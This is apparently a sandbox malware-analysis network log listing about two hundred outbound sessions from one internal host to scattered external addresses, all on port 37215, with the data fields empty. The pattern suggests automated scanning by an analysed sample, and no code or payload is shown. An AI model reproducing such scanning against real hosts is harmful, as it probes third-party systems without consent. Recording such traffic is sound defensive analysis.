                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4696192.168.2.1533026197.153.228.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4697192.168.2.1555100197.101.108.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4698192.168.2.1548070197.1.176.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4699192.168.2.1535946197.191.137.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4700192.168.2.1540412197.238.53.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4701192.168.2.1551900197.119.104.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4702192.168.2.1552568197.124.70.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4703192.168.2.1545994197.35.130.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4704192.168.2.1536726197.232.158.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4705192.168.2.1543632197.58.61.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4706192.168.2.1560170197.115.212.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4707192.168.2.1541164197.171.252.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4708192.168.2.1549168197.247.0.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4709192.168.2.1533226197.78.227.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4710192.168.2.1549942197.182.164.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4711192.168.2.1538594197.58.4.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4712192.168.2.1548144197.145.134.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4713192.168.2.1560096197.101.88.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4714192.168.2.1552996197.105.14.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4715192.168.2.1534184197.133.74.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4716192.168.2.1534240197.177.238.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4717192.168.2.1557566197.64.55.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4718192.168.2.1555358197.162.187.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4719192.168.2.1542786197.156.175.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4720192.168.2.1542426197.42.180.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4721192.168.2.1556630197.38.8.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4722192.168.2.1539344197.250.154.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4723192.168.2.1541380197.197.159.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4724192.168.2.1541000197.247.164.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4725192.168.2.1544586197.88.47.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4726192.168.2.1557910197.117.122.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4727192.168.2.1558242197.32.248.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4728192.168.2.1537378197.155.136.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4729192.168.2.1543672197.83.245.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4730192.168.2.1559708197.78.115.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4731192.168.2.1555316197.231.33.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4732192.168.2.1559080197.242.56.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4733192.168.2.1538886197.77.217.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4734192.168.2.1540632197.217.173.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4735192.168.2.1549586197.124.227.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4736192.168.2.1543830197.175.129.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4737192.168.2.1559190197.74.100.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4738192.168.2.1537292197.3.96.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4739192.168.2.1544216197.173.209.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4740192.168.2.1533254197.193.247.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4741192.168.2.1546474197.88.85.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4742192.168.2.1534172197.99.161.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4743192.168.2.1559370197.4.193.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4744192.168.2.1550190197.46.112.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4745192.168.2.1555322197.191.50.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4746192.168.2.1551850197.100.74.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4747192.168.2.1541084197.109.101.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4748192.168.2.1536940197.145.204.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4749192.168.2.1548046197.117.165.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4750192.168.2.1543348197.254.14.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4751192.168.2.1539246197.184.127.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4752192.168.2.1533720197.174.0.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4753192.168.2.1560138197.130.150.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4754192.168.2.1542180197.29.10.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4755192.168.2.1554922197.179.183.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4756192.168.2.1552828197.37.45.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4757192.168.2.1549598197.10.134.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4758192.168.2.1554414197.172.152.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4759192.168.2.1554636197.7.234.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4760192.168.2.1538626197.152.133.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4761192.168.2.1557526197.196.246.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4762192.168.2.1540826197.199.229.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4763192.168.2.1553786197.73.237.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4764192.168.2.1550638197.84.23.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4765192.168.2.1547402197.209.102.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4766192.168.2.1544272197.235.253.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4767192.168.2.1557738197.238.32.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4768192.168.2.1535082197.51.118.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4769192.168.2.1545410197.23.220.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4770192.168.2.1533052197.155.234.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4771192.168.2.1558510197.141.195.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4772192.168.2.1539230197.3.165.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4773192.168.2.1558934197.23.186.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4774192.168.2.1558666197.186.92.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4775192.168.2.1542422197.41.123.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4776192.168.2.1546278197.20.134.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4777192.168.2.1537218197.160.146.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4778192.168.2.1537794197.71.170.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4779192.168.2.1553316197.177.21.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4780192.168.2.1556686197.232.249.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4781192.168.2.1538842197.141.86.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4782192.168.2.1552708197.224.39.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4783192.168.2.1541922197.158.113.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4784192.168.2.1558296197.4.169.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4785192.168.2.1533190197.171.39.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4786192.168.2.1543518197.237.102.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4787192.168.2.1534640197.5.200.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4788192.168.2.1559622197.215.87.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4789192.168.2.1560048197.10.68.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4790192.168.2.1533198197.227.190.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4791192.168.2.1556010197.93.86.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4792192.168.2.1560218197.190.109.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4793192.168.2.1558358197.76.27.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4794192.168.2.1547080197.125.205.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4795192.168.2.1535274197.158.69.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4796192.168.2.1556286197.184.59.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4797192.168.2.1540524197.217.140.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4798192.168.2.1543814197.243.119.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4799192.168.2.1542060197.144.88.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4800192.168.2.1535738197.34.248.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4801192.168.2.1550732197.249.95.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4802192.168.2.1548712197.221.213.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4803192.168.2.1546330197.120.7.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4804192.168.2.1554316197.30.92.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4805192.168.2.1534768197.65.196.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4806192.168.2.1537564197.33.112.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4807192.168.2.1542998197.106.45.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4808192.168.2.1552352197.180.113.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4809192.168.2.1552992197.47.177.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4810192.168.2.1553432197.253.228.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4811192.168.2.1536608197.127.208.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4812192.168.2.1545664197.226.152.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4813192.168.2.1548680197.213.205.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4814192.168.2.1549114197.56.90.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4815192.168.2.1546652197.70.86.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4816192.168.2.1538408197.123.236.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4817192.168.2.1552142197.0.233.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4818192.168.2.1544244197.148.191.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4819192.168.2.1537174197.55.168.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4820192.168.2.1548282197.143.245.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4821192.168.2.1552422197.40.14.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4822192.168.2.1545252197.198.46.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4823192.168.2.1556892197.28.111.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4824192.168.2.1533038197.113.44.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4825192.168.2.1534222197.244.195.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4826192.168.2.1555450197.11.195.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4827192.168.2.1551874197.3.254.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4828192.168.2.1539692197.100.73.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4829192.168.2.1554976197.79.32.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4830192.168.2.1556958197.106.186.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4831192.168.2.1559142197.208.175.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4832192.168.2.1558130197.131.188.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4833192.168.2.1557796197.59.101.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4834192.168.2.1543096197.191.18.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4835192.168.2.1534022197.175.154.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4836192.168.2.1541862197.210.215.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4837192.168.2.1551448197.160.40.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4838192.168.2.1556260197.215.47.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4839192.168.2.1537060197.109.149.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4840192.168.2.1533672197.23.129.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4841192.168.2.1541936197.190.54.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4842192.168.2.1556072197.156.1.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4843192.168.2.1555580197.189.245.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4844192.168.2.1533882197.184.204.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4845192.168.2.1552294197.12.4.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4846192.168.2.1556560197.240.68.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4847192.168.2.1560622197.163.13.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4848192.168.2.1535026197.41.139.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4849192.168.2.1537680197.236.230.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4850192.168.2.1545920197.106.194.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4851192.168.2.1534392197.17.184.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4852192.168.2.1540386197.119.8.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4853192.168.2.1540372197.238.50.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4854192.168.2.1533712197.227.117.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4855192.168.2.1535754197.42.170.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4856192.168.2.1539320197.220.103.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4857192.168.2.1547542197.0.59.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4858192.168.2.1544118197.95.227.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4859192.168.2.1535008156.6.22.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4860192.168.2.1532834156.243.78.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4861192.168.2.1540188156.32.152.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4862192.168.2.1538582156.172.223.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4863192.168.2.1537330156.52.64.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4864192.168.2.1555440156.159.121.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4865192.168.2.1558264156.236.128.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4866192.168.2.1542562156.59.224.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4867192.168.2.1535398156.253.177.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4868192.168.2.1560892156.229.201.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4869192.168.2.1533970156.211.57.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4870192.168.2.1556606156.65.76.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4871192.168.2.1552684156.115.114.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4872192.168.2.1542214156.207.204.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4873192.168.2.1535236156.173.202.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4874192.168.2.1552632156.46.234.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4875192.168.2.1538138156.141.114.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4876192.168.2.1545508156.178.68.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4877192.168.2.1556200156.12.205.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4878192.168.2.1545634156.40.73.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4879192.168.2.1534670156.54.142.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4880192.168.2.1549464156.80.43.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4881192.168.2.1533834156.107.27.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4882192.168.2.1548742156.23.238.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4883192.168.2.1554920156.194.224.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4884192.168.2.1543646156.198.47.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4885192.168.2.1559254156.165.183.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4886192.168.2.1538128156.60.125.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4887192.168.2.1548454156.73.8.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4888192.168.2.1552954156.246.73.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4889192.168.2.1553272156.21.220.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4890192.168.2.1549060156.115.57.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4891192.168.2.1557130156.74.201.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4892192.168.2.1551670156.110.162.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4893192.168.2.1542030156.211.50.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4894192.168.2.1545600156.124.151.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4895192.168.2.1559458156.179.21.14737215
